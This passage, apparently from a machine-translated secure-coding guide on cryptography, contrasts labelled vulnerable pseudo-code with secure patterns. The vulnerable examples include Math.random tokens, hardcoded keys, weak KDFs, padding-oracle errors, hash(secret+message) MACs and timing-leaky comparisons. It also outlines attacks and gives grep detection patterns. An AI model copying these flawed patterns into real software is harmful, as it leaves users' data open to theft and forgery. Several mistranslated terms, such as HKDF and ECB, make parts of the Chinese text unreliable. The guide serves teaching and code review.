// - Eventually recover the authentication key H
// - Forge arbitrary messages with valid tags

// This is a CATASTROPHIC failure of GCM mode
// "Nonce misuse resistance" modes exist (GCM-SIV) for this reason

错误示例 4：使用 Math.random() 进行安全设置

// VULNERABLE: Math.random for token generation
function generateResetToken():
    token = ""
    for i in range(32):
        token = token + toString(floor(random() * 16), base = 16)
    return token

// VULNERABLE: Math.random for session ID
function createSessionId():
    return "session_" + toString(random() * 1000000000)

// VULNERABLE: Seeded random with predictable seed
function generateApiKey(userId):
    setSeed(userId * getCurrentTimestamp())
    key = ""
    for i in range(32):
        key = key + randomChoice(ALPHANUMERIC_CHARS)
    return key

// VULNERABLE: Using non-crypto random for encryption IV
function quickEncrypt(data, key):
    iv = []
    for i in range(16):
        iv.append(floor(random() * 256))
    return AES_CBC_encrypt(key, iv, data)

// VULNERABLE: JavaScript Math.random() is NOT cryptographic
function generateToken():
    return btoa(String.fromCharCode.apply(null,
        Array.from({length: 32}, () => Math.floor(Math.random() * 256))
    ))

为什么这样做很危险：

Math.random() 使用可预测的伪随机数生成器 (PRNG)。
内部状态可以从大约 600 个输出中恢复（V8 发动机）。
一旦状态已知，所有过去和未来的值都可以预测。
会话令牌、API密钥和重置令牌变得容易被猜到。
许多伪随机数生成器实现方案的周期较短或种子较弱。

状态恢复攻击：

// Attacker collects multiple password reset tokens
tokens_observed = [
    "a3f7c2e9b1d4...",  // Token 1
    "8e2a5f1c9b3d...",  // Token 2
    // ... collect ~30-50 tokens
]

// Using z3 SMT solver or custom reversing:
function recoverMathRandomState(observed_outputs):
    // V8's xorshift128+ can be reversed
    // Once state recovered, predict next token
    state = reverseEngineerState(observed_outputs)
    next_token = predictNextOutput(state)
    return next_token

// Attacker generates password reset for victim
// Then predicts the token value
// Completes password reset without email access

错误示例 5：硬编码对称密钥

// VULNERABLE: Key in source code
ENCRYPTION_KEY = "MySecretKey12345"

function encryptUserData(data):
    return AES_encrypt(ENCRYPTION_KEY, data)

// VULNERABLE: Key derived from application constant
function getEncryptionKey():
    return sha256(APPLICATION_NAME + ENVIRONMENT + "secret")

// VULNERABLE: Same key for all users
MASTER_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef")

function encryptForUser(userId, data):
    return AES_encrypt(MASTER_KEY, data)

// VULNERABLE: Key in configuration file (committed to git)
// config.py:
CRYPTO_CONFIG = {
    "encryption_key": "dGhpcyBpcyBhIHNlY3JldCBrZXk=",  // Base64 encoded
    "hmac_key": "another_secret_key_here"
}

// VULNERABLE: Weak key (too short)
function quickEncrypt(data):
    key = "short"  // 5 bytes, not 16/24/32
    return AES_encrypt(pad(key, 16), data)  // Padded with zeros!

为什么这样做很危险：

源代码中的键值会永久保存在版本控制历史记录中。
硬编码的键值无法在不部署代码的情况下进行轮换。
编译/反编译会暴露二进制文件中的密钥。
单密钥泄露会影响所有加密数据
弱密钥/短密钥可以通过暴力破解。
从可预测的输入中推导出关键信息可以实现重构

不良示例 6：弱密钥派生

// VULNERABLE: Direct use of password as key
function deriveKey(password):
    return password.encode()[:32]  // Truncate or pad to key size

// VULNERABLE: Simple hash as key derivation
function passwordToKey(password):
    return sha256(password)  // Single round, no salt

// VULNERABLE: MD5-based key derivation
function getKeyFromPassword(password, salt):
    return md5(password + salt)

// VULNERABLE: Insufficient iterations
function deriveKeyPBKDF2(password, salt):
    return PBKDF2(password, salt, iterations = 1000)
    // 2025 recommendation: minimum 600,000 for SHA256

// VULNERABLE: Using key derivation output directly for multiple purposes
function setupCrypto(password, salt):
    derived = PBKDF2(password, salt, iterations = 100000, keyLength = 64)
    encryptionKey = derived[:32]   // First half
    hmacKey = derived[32:]         // Second half
    // Problem: related keys, should use separate derivations

// VULNERABLE: Weak salt (too short, predictable, or reused)
function deriveKeyWithWeakSalt(password):
    salt = "salt"  // Static salt defeats purpose
    return PBKDF2(password, salt, iterations = 100000)

为什么这样做很危险：

直接使用密码会使攻击者在字典攻击中占优。
单哈希推导可实现 GPU 加速的暴力破解
PBKDF2/bcrypt 的迭代次数少，因此容易受到攻击。
MD5密钥派生继承了MD5的所有弱点
静态/弱盐值允许预计算攻击
相关密钥派生可能会暴露密码学漏洞

迭代次数指导（2025）：

// PBKDF2-SHA256 minimum iterations by use case:
// - Interactive login (100ms budget): 600,000 iterations
// - Background/async (1s budget): 2,000,000 iterations
// - High-security (offline storage): 10,000,000 iterations

// bcrypt cost factor:
// - Minimum 2025: cost = 12 (about 250ms)
// - Recommended: cost = 13-14
// - High-security: cost = 15+

// Argon2id parameters (2025):
// - Memory: 64 MB minimum, 256 MB recommended
// - Iterations: 3 minimum
// - Parallelism: match available cores
// - Argon2id recommended over Argon2i or Argon2d

优秀示例：安全加密模式

优秀示例 1：使用 bcrypt/Argon2 进行正确的密码哈希

// SECURE: bcrypt with appropriate cost factor
function hashPassword(password):
    // Cost factor 12 = ~250ms on modern hardware
    // Increase cost factor annually as hardware improves
    cost = 12
    return bcrypt.hash(password, cost)

function verifyPassword(password, storedHash):
    // bcrypt.verify handles timing-safe comparison internally
    return bcrypt.verify(password, storedHash)

// SECURE: Argon2id (recommended for new applications)
function hashPasswordArgon2(password):
    // Argon2id: hybrid resistant to both side-channel and GPU attacks
    options = {
        type: ARGON2ID,
        memoryCost: 65536,    // 64 MB
        timeCost: 3,          // 3 iterations
        parallelism: 4,       // 4 parallel threads
        hashLength: 32        // 256-bit output
    }
    return argon2.hash(password, options)

function verifyPasswordArgon2(password, storedHash):
    return argon2.verify(storedHash, password)

// SECURE: scrypt for memory-hard hashing
function hashPasswordScrypt(password):
    // N = CPU/memory cost (power of 2)
    // r = block size
    // p = parallelization parameter
    salt = generateSecureRandom(16)
    hash = scrypt(password, salt, N = 2^17, r = 8, p = 1, keyLen = 32)
    return encodeSaltAndHash(salt, hash)

// SECURE: Migrating from weak to strong hashing
function upgradePasswordHash(userId, password, currentHash):
    // Verify against old hash
    if legacyVerify(password, currentHash):
        // Re-hash with modern algorithm
        newHash = hashPasswordArgon2(password)
        database.update("users", userId, {"password_hash": newHash})
        return true
    return false

为什么说它是安全的：

bcrypt/argon2/scrypt 故意设计得很慢（内存密集型）
内置盐生成和存储
验证函数中内置了时序安全的比较机制
可配置的工作系数使其能够适应未来需求
Argon2id 能够抵御 GPU 攻击和侧信道攻击。

优秀示例 2：认证加密（GCM 模式）

// SECURE: AES-256-GCM with proper nonce handling
function encryptAESGCM(plaintext, key):
    // Generate cryptographically random 96-bit nonce
    nonce = generateSecureRandom(12)

    cipher = createCipher("AES-256-GCM", key)
    cipher.setNonce(nonce)

    // Optional: Add authenticated additional data (AAD)
    // AAD is authenticated but NOT encrypted
    aad = "context:user_data:v1"
    cipher.setAAD(aad)

    ciphertext = cipher.encrypt(plaintext)
    authTag = cipher.getAuthTag()  // 128-bit tag

    // Return nonce + tag + ciphertext (all needed for decryption)
    return nonce + authTag + ciphertext

function decryptAESGCM(encryptedData, key):
    // Extract components
    nonce = encryptedData[:12]
    authTag = encryptedData[12:28]
    ciphertext = encryptedData[28:]

    cipher = createCipher("AES-256-GCM", key)
    cipher.setNonce(nonce)
    cipher.setAAD("context:user_data:v1")  // Must match encryption
    cipher.setAuthTag(authTag)

    try:
        plaintext = cipher.decrypt(ciphertext)
        return plaintext
    catch AuthenticationError:
        // Tag verification failed - data tampered or wrong key
        log.warn("Decryption authentication failed - possible tampering")
        return null

// SECURE: XChaCha20-Poly1305 (extended nonce variant)
function encryptXChaCha(plaintext, key):
    // 192-bit nonce - safe for random generation
    nonce = generateSecureRandom(24)

    ciphertext, tag = xchachapoly.encrypt(key, nonce, plaintext)

    return nonce + tag + ciphertext

为什么说它是安全的：

GCM 既能保证保密性，又能保证诚信。
认证标签可检测任何篡改行为
96 位 nonce 对于每个密钥最多生成约 2^32 条消息的随机数来说是安全的。
XChaCha20 使用 192 位 nonce，对几乎无限量的消息传输都是安全的。
AAD允许将密文与上下文绑定（防止跨上下文攻击）

优秀示例 3：正确生成 IV/随机数

// SECURE: Random IV for CBC mode
function encryptCBC(plaintext, key):
    // 128-bit random IV for AES
    iv = generateSecureRandom(16)

    cipher = createCipher("AES-256-CBC", key)
    ciphertext = cipher.encrypt(plaintext, iv)

    // Prepend IV to ciphertext (IV doesn't need to be secret)
    return iv + ciphertext

function decryptCBC(encryptedData, key):
    iv = encryptedData[:16]
    ciphertext = encryptedData[16:]

    cipher = createCipher("AES-256-CBC", key)
    return cipher.decrypt(ciphertext, iv)

// SECURE: Counter-based nonce with random prefix (for GCM)
class SecureNonceGenerator:
    // Random 32-bit prefix + 64-bit counter
    // Safe for 2^64 messages with same key

    function __init__():
        this.prefix = generateSecureRandom(4)  // 32-bit random
        this.counter = 0
        this.lock = Mutex()

    function generate():
        this.lock.acquire()
        this.counter = this.counter + 1
        if this.counter >= 2^64:
            throw Error("Nonce counter exhausted - rotate key")
        nonce = this.prefix + intToBytes(this.counter, 8)
        this.lock.release()
        return nonce

// SECURE: Synthetic IV (SIV) for nonce-misuse resistance
function encryptSIV(plaintext, key):
    // AES-GCM-SIV: Safe even if nonce is accidentally repeated
    nonce = generateSecureRandom(12)
    ciphertext = AES_GCM_SIV_encrypt(key, nonce, plaintext)
    return nonce + ciphertext
    // Note: Repeated nonce only leaks if same plaintext encrypted

为什么说它是安全的：

随机变量会阻止对消息进行模式分析
在密文前添加初始化向量 (IV) 可确保 IV 始终可用于解密。
带有随机前缀的计数器可防止实例间的 nonce 冲突
SIV 模式为防止意外重复使用 nonce 提供了安全保障。

优秀示例 4：密码学安全的随机数

// SECURE: Using OS/platform CSPRNG

// Node.js
function generateSecureRandom(length):
    return crypto.randomBytes(length)

// Python
function generateSecureRandom(length):
    return secrets.token_bytes(length)

// Java
function generateSecureRandom(length):
    random = SecureRandom.getInstanceStrong()
    bytes = new byte[length]
    random.nextBytes(bytes)
    return bytes

// Go
function generateSecureRandom(length):
    bytes = make([]byte, length)
    _, err = crypto_rand.Read(bytes)
    if err != nil:
        panic("CSPRNG failure")
    return bytes

// SECURE: Token generation for URLs/APIs
function generateUrlSafeToken(length):
    // Generate random bytes, encode to URL-safe base64
    randomBytes = generateSecureRandom(length)
    return base64UrlEncode(randomBytes)

function generateResetToken():
    // 256 bits of entropy for password reset token
    return generateUrlSafeToken(32)

function generateApiKey():
    // Prefix for identification + random component
    prefix = "sk_live_"
    randomPart = generateUrlSafeToken(24)
    return prefix + randomPart

// SECURE: Random number in range
function secureRandomInt(min, max):
    range = max - min + 1
    bytesNeeded = ceil(log2(range) / 8)

    // Rejection sampling to avoid modulo bias
    while true:
        randomBytes = generateSecureRandom(bytesNeeded)
        value = bytesToInt(randomBytes)
        if value < (2^(bytesNeeded*8) / range) * range:
            return min + (value % range)

为什么说它是安全的：

CSPRNG（密码学安全伪随机数生成器）利用操作系统熵源。
即使完全了解输出结果，也无法预测。
适当的拒绝抽样可以避免模偏差
标准库在正确使用时可提供安全的默认设置。

优秀示例 5：关键导数函数

// SECURE: PBKDF2 with sufficient iterations
function deriveKeyPBKDF2(password, purpose):
    // Generate unique salt per derivation
    salt = generateSecureRandom(16)

    // 600,000 iterations minimum for SHA-256 (2025)
    iterations = 600000

    // Derive key of required length
    derivedKey = PBKDF2(
        password = password,
        salt = salt,
        iterations = iterations,
        keyLength = 32,  // 256 bits
        hashFunction = SHA256
    )

    // Store salt with derived key for later verification
    return {salt: salt, key: derivedKey}

// SECURE: HKDF for deriving multiple keys from one secret
function deriveMultipleKeys(masterSecret, purpose):
    // HKDF-Extract: Create pseudorandom key from input
    salt = generateSecureRandom(32)
    prk = HKDF_Extract(salt, masterSecret)

    // HKDF-Expand: Derive purpose-specific keys
    encryptionKey = HKDF_Expand(prk, info = "encryption", length = 32)
    hmacKey = HKDF_Expand(prk, info = "authentication", length = 32)
    searchKey = HKDF_Expand(prk, info = "search-index", length = 32)

    return {
        encryption: encryptionKey,
        hmac: hmacKey,
        search: searchKey,
        salt: salt  // Store for re-derivation
    }

// SECURE: Argon2 for password-based key derivation
function deriveKeyFromPassword(password, salt = null):
    if salt == null:
        salt = generateSecureRandom(16)

    derivedKey = argon2id(
        password = password,
        salt = salt,
        memoryCost = 65536,    // 64 MB
        timeCost = 3,
        parallelism = 4,
        outputLength = 32
    )

    return {key: derivedKey, salt: salt}

// SECURE: Key derivation with domain separation
function deriveKeyWithContext(masterKey, context, subkeyId):
    // Context prevents cross-purpose key use
    info = context + ":" + subkeyId
    return HKDF_Expand(masterKey, info, 32)

// Example: Derive per-user encryption keys
function getUserEncryptionKey(masterKey, userId):
    return deriveKeyWithContext(masterKey, "user-data-encryption", userId)

为什么说它是安全的：

迭代次数过多使得暴力破解法不切实际。
HKDF 正确地将来自同一来源的多个密钥分离出来
域隔离可以防止为一种目的派生的键被用于其他目的。
Argon2 提供针对 GPU 攻击的内存级保护
每个派生过程使用唯一的盐值可防止预计算攻击

优秀示例 6：关键轮转模式

// SECURE: Key versioning for rotation
class KeyManager:
    function __init__(keyStore):
        this.keyStore = keyStore
        this.currentKeyVersion = keyStore.getCurrentVersion()

    function encrypt(plaintext):
        key = this.keyStore.getKey(this.currentKeyVersion)
        nonce = generateSecureRandom(12)

        ciphertext = AES_GCM_encrypt(key, nonce, plaintext)

        // Include key version in output for decryption
        return encodeVersionedCiphertext(
            version = this.currentKeyVersion,
            nonce = nonce,
            ciphertext = ciphertext
        )

    function decrypt(encryptedData):
        version, nonce, ciphertext = decodeVersionedCiphertext(encryptedData)

        // Fetch correct key version (may be old version)
        key = this.keyStore.getKey(version)
        if key == null:
            throw KeyNotFoundError("Key version " + version + " not available")

        return AES_GCM_decrypt(key, nonce, ciphertext)

    function rotateKey():
        newVersion = this.currentKeyVersion + 1
        newKey = generateSecureRandom(32)
        this.keyStore.storeKey(newVersion, newKey)
        this.currentKeyVersion = newVersion

        // Schedule background re-encryption of old data
        scheduleReEncryption(newVersion - 1, newVersion)

// SECURE: Re-encryption during key rotation
function reEncryptData(dataId, oldVersion, newVersion, keyManager):
    // Fetch encrypted data
    encryptedData = database.get("encrypted_data", dataId)

    // Verify it uses old key version
    currentVersion = extractKeyVersion(encryptedData)
    if currentVersion >= newVersion:
        return  // Already using new or newer key

    // Decrypt with old key, re-encrypt with new
    plaintext = keyManager.decrypt(encryptedData)
    newEncryptedData = keyManager.encrypt(plaintext)

    // Atomic update
    database.update("encrypted_data", dataId, {
        "data": newEncryptedData,
        "key_version": newVersion,
        "rotated_at": getCurrentTimestamp()
    })

// SECURE: Key wrapping for storage
function storeEncryptionKey(keyToStore, masterKey):
    // Wrap (encrypt) the key with master key
    nonce = generateSecureRandom(12)
    wrappedKey = AES_GCM_encrypt(masterKey, nonce, keyToStore)

    return {
        wrapped_key: wrappedKey,
        nonce: nonce,
        algorithm: "AES-256-GCM",
        created_at: getCurrentTimestamp()
    }

function retrieveEncryptionKey(wrappedKeyData, masterKey):
    return AES_GCM_decrypt(
        masterKey,
        wrappedKeyData.nonce,
        wrappedKeyData.wrapped_key
    )

为什么说它是安全的：

密钥版本控制允许旧数据在轮换期间保持可解密状态。
后台重新加密会逐步将所有数据迁移到新密钥。
钥匙套可保护存放的钥匙免受静置损坏
逐步轮换可最大限度地降低操作风险

边缘案例部分

极端情况 1：填充 Oracle 漏洞

// VULNERABLE: Revealing padding validity in error messages
function decryptCBC_vulnerable(ciphertext, key, iv):
    try:
        plaintext = AES_CBC_decrypt(key, iv, ciphertext)
        unpadded = removePKCS7Padding(plaintext)
        return {success: true, data: unpadded}
    catch PaddingError:
        return {success: false, error: "Invalid padding"}  // ORACLE!
    catch DecryptionError:
        return {success: false, error: "Decryption failed"}

// Attack: Padding oracle allows full plaintext recovery
// Attacker modifies ciphertext bytes, observes padding errors
// ~128 requests per byte to recover plaintext (on average)

// SECURE: Use authenticated encryption (GCM) or constant-time handling
function decryptCBC_secure(ciphertext, key, iv):
    try:
        // First verify HMAC before any decryption
        providedHmac = ciphertext[-32:]
        ciphertextData = ciphertext[:-32]

        expectedHmac = HMAC_SHA256(key, iv + ciphertextData)
        if not constantTimeEquals(providedHmac, expectedHmac):
            return {success: false, error: "Decryption failed"}  // Generic error

        plaintext = AES_CBC_decrypt(key, iv, ciphertextData)
        unpadded = removePKCS7Padding(plaintext)
        return {success: true, data: unpadded}
    catch:
        return {success: false, error: "Decryption failed"}  // Same error always

// BEST: Just use GCM which prevents this class of attack entirely

吸取的教训：

永远不要透露填充是否有效或无效
始终使用经过身份验证的加密方式（先加密后使用 MAC 或 GCM）。
所有解密失败均返回相同的错误信息。

极端情况 2：长度扩展攻击

// VULNERABLE: Using hash(secret + message) for authentication
function createAuthToken(secretKey, message):
    return sha256(secretKey + message)  // Length extension vulnerable!

function verifyAuthToken(secretKey, message, token):
    expected = sha256(secretKey + message)
    return token == expected

// Attack: Attacker knows hash(secret + message) and length of secret
// Can compute hash(secret + message + padding + attacker_data)
// Without knowing the secret!

// Example attack:
// Original: hash(secret + "amount=100") = abc123...
// Attacker computes: hash(secret + "amount=100" + padding + "&amount=999")
// Server verifies this as valid!

// SECURE: Use HMAC
function createAuthTokenSecure(secretKey, message):
    return HMAC_SHA256(secretKey, message)

function verifyAuthTokenSecure(secretKey, message, token):
    expected = HMAC_SHA256(secretKey, message)
    return constantTimeEquals(token, expected)

// SECURE: Use hash(message + secret) - prevents extension but HMAC preferred
// SECURE: Use SHA-3/SHA-512/256 (resistant to length extension)
function alternativeAuth(secretKey, message):
    return SHA3_256(secretKey + message)  // SHA-3 is resistant

吸取的教训：

切勿使用哈希（密钥 + 消息）进行身份验证
HMAC 专门设计用于防止长度延长
SHA-3 系列算法具有较强的抗干扰能力，但为了保证一致性，仍然建议使用 HMAC。

极端情况 3：针对比较的计时攻击

// VULNERABLE: Early-exit string comparison
function verifyToken(providedToken, expectedToken):
    if length(providedToken) != length(expectedToken):
        return false
    for i in range(length(providedToken)):
        if providedToken[i] != expectedToken[i]:
            return false  // Early exit reveals position of first difference
    return true

// Attack: Timing differences reveal correct characters
// Correct first char: ~1μs longer than wrong first char
// Attacker can brute-force character-by-character

// VULNERABLE: Using == operator (language-dependent timing)
function checkHmac(provided, expected):
    return provided == expected  // May have variable-time implementation

// SECURE: Constant-time comparison
function constantTimeEquals(a, b):
    if length(a) != length(b):
        // Still constant-time for the comparison
        // Length difference may leak - consider padding
        return false

    result = 0
    for i in range(length(a)):
        // XOR and OR accumulate differences without early exit
        result = result | (a[i] XOR b[i])
    return result == 0

// SECURE: Using crypto library comparison
function verifyHmacSecure(message, providedHmac, key):
    expectedHmac = HMAC_SHA256(key, message)
    return crypto.timingSafeEqual(providedHmac, expectedHmac)

// SECURE: Double-HMAC comparison (timing-safe by design)
function verifyWithDoubleHmac(message, providedMac, key):
    expectedMac = HMAC_SHA256(key, message)
    // Compare HMACs of the MACs - timing doesn't leak original MAC
    return HMAC_SHA256(key, providedMac) == HMAC_SHA256(key, expectedMac)

吸取的教训：

所有与秘密相关的操作均使用恒定时间比较。
大多数语言都有包含定时安全函数的加密库。
当无法使用恒定时间比较时，双重 HMAC 技巧有效。

特殊情况 4：跨上下文的关键重用

// VULNERABLE: Same key for encryption and authentication
SHARED_KEY = loadKey("master")

function encryptData(data):
    return AES_GCM_encrypt(SHARED_KEY, generateNonce(), data)

function signData(data):
    return HMAC_SHA256(SHARED_KEY, data)  // Same key!

// Problem: Cryptographic interactions between uses
// Some attacks become possible when key is used in multiple algorithms

// VULNERABLE: Same key for different users/tenants
function encryptForTenant(tenantId, data):
    return AES_GCM_encrypt(MASTER_KEY, generateNonce(), data)
    // All tenants share encryption key - one compromise = all compromised

// SECURE: Derive separate keys for each purpose
MASTER_KEY = loadKey("master")

function getEncryptionKey():
    return HKDF_Expand(MASTER_KEY, "encryption-aes-256-gcm", 32)

function getAuthenticationKey():
    return HKDF_Expand(MASTER_KEY, "authentication-hmac-sha256", 32)

function getSearchKey():
    return HKDF_Expand(MASTER_KEY, "searchable-encryption", 32)

// SECURE: Per-tenant key derivation
function getTenantEncryptionKey(tenantId):
    // Each tenant gets unique derived key
    info = "tenant-encryption:" + tenantId
    return HKDF_Expand(MASTER_KEY, info, 32)

function encryptForTenantSecure(tenantId, data):
    tenantKey = getTenantEncryptionKey(tenantId)
    return AES_GCM_encrypt(tenantKey, generateNonce(), data)

吸取的教训：

始终为不同的加密操作生成不同的密钥。
在HKDF中使用域分离（不同的“info”参数）。
基于租户/用户的密钥派生限制了泄露事件的影响范围。

常见错误部分

常见错误 1：未进行身份验证就使用加密

// COMMON MISTAKE: CBC encryption without HMAC
function encryptDataWrong(data, key):
    iv = generateSecureRandom(16)
    ciphertext = AES_CBC_encrypt(key, iv, data)
    return iv + ciphertext
    // Missing: No way to detect tampering!

// Attack: Bit-flipping in CBC mode
// Flipping bit N in ciphertext block C[i] flips bit N in plaintext block P[i+1]
// Attacker can modify data without detection

// Example: Encrypted JSON {"admin": false, "amount": 100}
// Attacker can flip bits to change "false" to "true" or modify amount

// CORRECT: Encrypt-then-MAC
function encryptDataCorrect(data, encKey, macKey):
    iv = generateSecureRandom(16)
    ciphertext = AES_CBC_encrypt(encKey, iv, data)

    // MAC covers IV and ciphertext
    mac = HMAC_SHA256(macKey, iv + ciphertext)

    return iv + ciphertext + mac

function decryptDataCorrect(encrypted, encKey, macKey):
    iv = encrypted[:16]
    mac = encrypted[-32:]
    ciphertext = encrypted[16:-32]

    // Verify MAC FIRST, before any decryption
    expectedMac = HMAC_SHA256(macKey, iv + ciphertext)
    if not constantTimeEquals(mac, expectedMac):
        throw IntegrityError("Data has been tampered with")

    return AES_CBC_decrypt(encKey, iv, ciphertext)

// BETTER: Just use GCM which includes authentication
function encryptDataBest(data, key):
    nonce = generateSecureRandom(12)
    ciphertext, tag = AES_GCM_encrypt(key, nonce, data)
    return nonce + ciphertext + tag

解决方案：

始终使用经过身份验证的加密方式（GCM、ChaCha20-Poly1305）
如果使用 CBC，请添加 HMAC，并采用先加密后 MAC 的模式。
解密前请先验证认证标签。

常见错误二：混淆编码和加密

// COMMON MISTAKE: Base64 as "encryption"
function "encrypt"Data(sensitiveData):
    return base64Encode(sensitiveData)  // NOT ENCRYPTION!

function "decrypt"Data(encodedData):
    return base64Decode(encodedData)

// COMMON MISTAKE: XOR with short key as encryption
function "encrypt"WithXor(data, password):
    key = password.repeat(ceil(length(data) / length(password)))
    return xor(data, key)  // Trivially broken with frequency analysis

// COMMON MISTAKE: ROT13 or character substitution
function "encrypt"Text(text):
    return rot13(text)  // No security at all

// COMMON MISTAKE: Obfuscation ≠ encryption
function storeApiKey(apiKey):
    obfuscated = ""
    for char in apiKey:
        obfuscated += chr(ord(char) + 5)  // Just shifted characters
    return obfuscated

// COMMON MISTAKE: Custom "encryption" algorithm
function myEncrypt(data, key):
    result = ""
    for i, char in enumerate(data):
        newChar = chr((ord(char) + ord(key[i % len(key)]) * 7) % 256)
        result += newChar
    return result  // Easily broken - don't invent crypto!

现实检验：

方法	安全级别	用例
Base64	0（无）	仅二进制到文本编码
ROT13	0（无）	笑话，剧透隐藏
与重复密钥进行异或运算	微不足道的破损	切勿使用
本土“加密”	未知，可能已损坏	切勿使用
使用随机密钥的 AES-GCM	强的	实际加密

解决方案：

使用标准算法：AES-GCM、ChaCha20-Poly1305
永远不要发明加密算法
编码（Base64、十六进制）用于表示，而非安全性

常见错误 3：密钥生成后存储不当

// COMMON MISTAKE: Logging the key
function generateAndStoreKey():
    key = generateSecureRandom(32)
    log.info("Generated new encryption key: " + hexEncode(key))  // LOGGED!
    return key

// COMMON MISTAKE: Key in config file committed to git
// config.json:
{
    "database_url": "...",
    "encryption_key": "a1b2c3d4e5f6..."  // Will be in git history forever
}

// COMMON MISTAKE: Key in environment variable visible in process list
// Launching: ENCRYPTION_KEY=secret123 ./myapp
// `ps aux` shows: myapp ENCRYPTION_KEY=secret123

// COMMON MISTAKE: Key stored in database alongside encrypted data
function storeEncryptedData(userId, sensitiveData):
    key = generateSecureRandom(32)
    encrypted = AES_GCM_encrypt(key, generateNonce(), sensitiveData)
    database.insert("user_data", {
        user_id: userId,
        encrypted_data: encrypted,
        encryption_key: key  // KEY NEXT TO DATA = pointless encryption
    })

// COMMON MISTAKE: Key derivation material stored insecurely
function setupEncryption(password):
    salt = generateSecureRandom(16)
    key = deriveKey(password, salt)

    // Storing in easily accessible location
    localStorage.setItem("encryption_salt", salt)
    localStorage.setItem("derived_key", key)  // KEY IN BROWSER STORAGE!

安全密钥存储模式：

// SECURE: Using a key management service (KMS)
function storeKeySecurely(keyId, keyMaterial):
    // AWS KMS, Azure Key Vault, GCP KMS, HashiCorp Vault
    kms.storeKey(keyId, keyMaterial, {
        rotation_period: "90 days",
        deletion_protection: true,
        access_policy: restrictedPolicy
    })

// SECURE: Key wrapped with hardware security module (HSM)
function wrapKeyForStorage(dataKey):
    wrappingKey = hsm.getWrappingKey()  // Never leaves HSM
    wrappedKey = hsm.wrapKey(dataKey, wrappingKey)
    return wrappedKey  // Safe to store - can only unwrap with HSM

// SECURE: Envelope encryption pattern
function envelopeEncrypt(data):
    // Generate data encryption key (DEK)
    dek = generateSecureRandom(32)

    // Encrypt data with DEK
    encryptedData = AES_GCM_encrypt(dek, generateNonce(), data)

    // Encrypt DEK with key encryption key (KEK) from KMS
    encryptedDek = kms.encrypt(dek)

    // Store encrypted DEK with encrypted data
    return {
        encrypted_data: encryptedData,
        encrypted_key: encryptedDek,  // DEK is encrypted, safe to store
        kms_key_id: kms.getCurrentKeyId()
    }

算法选择指南

对称加密

算法	钥匙尺寸	用例	笔记
AES-256-GCM	256 位	通用	推荐默认值，96 位 nonce
ChaCha20-Poly1305	256 位	对性能要求高的移动平台	无需 AES-NI 硬件即可更快
XChaCha20-Poly1305	256 位	大容量加密	192 位 nonce，可安全用于随机生成
AES-256-GCM-SIV	256 位	抗非法活动滥用	速度稍慢，但意外重复使用更安全

避免使用： DES、3DES、RC4、Blowfish、AES-ECB、不含HMAC的AES-CBC

密码哈希

算法	记忆	用例	笔记
Argon2id	64+ MB	新应用	最佳保护，内存硬盘
bcrypt	不适用	传统兼容性	广泛支持，成本12+
scrypt	64+ MB	当氩气不可用时	不错的替代方案

避免使用： MD5、SHA1、SHA256（单轮）、迭代次数少于60万次的PBKDF2

关键推导

算法	用例	笔记
Argon2id	基于密码	最适合密码 → 密钥
香港防卫部队	关键扩展	从单个键派生多个键
PBKDF2-SHA256	兼容性	需要 60 万次以上迭代

避免使用：基于 MD5 的密钥派生函数、单次哈希派生、低迭代次数

消息认证

算法	输出	用例	笔记
HMAC-SHA256	256 位	通用	标准选择
HMAC-SHA512	512 位	额外安全边际	64 位系统运行速度更快
Poly1305	128 位	与 ChaCha20	AEAD 的一部分

避免使用： MD5、SHA1、未构建 HMAC 的普通哈希算法

数字签名

算法	用例	笔记
Ed25519	通用	快速、安全、简单的 API
ECDSA P-256	兼容性	广泛支持
RSA-PSS	遗留系统	需要 2048 位以上的密钥

避免使用： RSA PKCS#1 v1.5、DSA、ECDSA 等弱曲线加密算法。

检测技巧：如何发现加密问题

代码审查模式

// RED FLAGS in cryptographic code:

// 1. Weak hash functions
md5(               // Search for: md5\s*\(
sha1(              // Search for: sha1\s*\(
SHA1.Create()      // Search for: SHA1

// 2. ECB mode
mode = "ECB"       // Search for: ECB
AES/ECB/           // Search for: /ECB/
mode_ECB           // Search for: ECB

// 3. Static or weak IVs
iv = [0, 0, 0, ...   // Search for: iv\s*=\s*\[0
IV = "0000           // Search for: IV\s*=\s*["']0
static IV            // Search for: static.*[Ii][Vv]

// 4. Math.random for security
Math.random()        // Search for: Math\.random
random.randint(      // Search for: randint\( (context matters)

// 5. Weak secrets
= "secret"           // Search for: =\s*["']secret
SECRET = "           // Search for: SECRET\s*=\s*["']
= "password"         // Search for: =\s*["']password

// 6. Direct password use as key
key = password       // Search for: key\s*=\s*password
AES(password)        // Search for: AES\s*\(\s*password

// 7. Low iteration counts
iterations: 1000     // Search for: iterations.*\d{1,4}[^0-9]
rounds = 100         // Search for: rounds\s*=\s*\d{1,3}[^0-9]

// GREP patterns for security review:
// [Mm][Dd]5\s*\(
// [Ss][Hh][Aa]1\s*\(
// ECB
// [Ii][Vv]\s*=\s*\[0
// Math\.random
// iterations.*[0-9]{1,4}[^0-9]
// (password|secret)\s*=\s*["']

安全测试清单

// Cryptographic security test cases:

// 1. Algorithm verification
- [ ] No MD5 or SHA1 for password hashing
- [ ] No ECB mode encryption
- [ ] AES key size is 256 bits (not 128)
- [ ] Authenticated encryption used (GCM, ChaCha20-Poly1305)

// 2. Randomness verification
- [ ] IVs/nonces are cryptographically random
- [ ] Session tokens use CSPRNG
- [ ] No predictable seeds for random generation

// 3. Key management
- [ ] Keys not hardcoded in source
- [ ] Keys not logged or exposed in errors
- [ ] Key derivation uses appropriate KDF
- [ ] Key rotation mechanism exists

// 4. Password hashing
- [ ] bcrypt cost ≥ 12 or Argon2 with appropriate params
- [ ] Unique salt per password
- [ ] Timing-safe comparison used

// 5. Implementation details
- [ ] Constant-time comparison for secrets
- [ ] No padding oracle vulnerabilities
- [ ] HMAC used (not hash(key+message))
- [ ] Authenticated encryption or encrypt-then-MAC

安全检查清单

密码哈希可以使用 Argon2id、bcrypt（成本 12+）或 scrypt。
所有密码都具有唯一的随机盐值（由 bcrypt/Argon2 自动处理）。
对于安全敏感型哈希，不使用 MD5、SHA1 或单轮 SHA256。
加密采用认证模式（AES-GCM、ChaCha20-Poly1305）
无欧洲央行模式加密
使用加密安全的随机数生成器生成的 IV/nonce
每次加密操作都使用唯一的初始化向量/随机数。
跟踪 GCM nonce 以防止重复使用（或使用 SIV 模式）
为了安全起见，所有随机值均使用 CSPRNG（crypto.randomBytes，secrets 模块）。
出于安全考虑，请勿使用 Math.random() 或类似的伪随机数生成器。
